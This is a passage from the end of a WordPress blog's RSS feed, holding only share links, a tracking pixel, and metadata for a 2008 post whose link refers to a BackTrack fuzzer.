<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/backtrackworld.wordpress.com/20/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/backtrackworld.wordpress.com/20/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/backtrackworld.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/backtrackworld.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/backtrackworld.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/backtrackworld.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/backtrackworld.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/backtrackworld.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/backtrackworld.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/backtrackworld.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/backtrackworld.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/backtrackworld.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/backtrackworld.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/backtrackworld.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/backtrackworld.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/backtrackworld.wordpress.com/20/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=backtrackworld.wordpress.com&amp;blog=4765852&amp;post=20&amp;subd=backtrackworld&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://backtrackworld.wordpress.com/2008/09/09/fuzzer-12-de-backtrack-3/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/35c05793b6bcf899b86d8eef15cfb712?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">root@Aquiles:~#</media:title>
		</media:content>
	</item>
	</channel>
</rss>
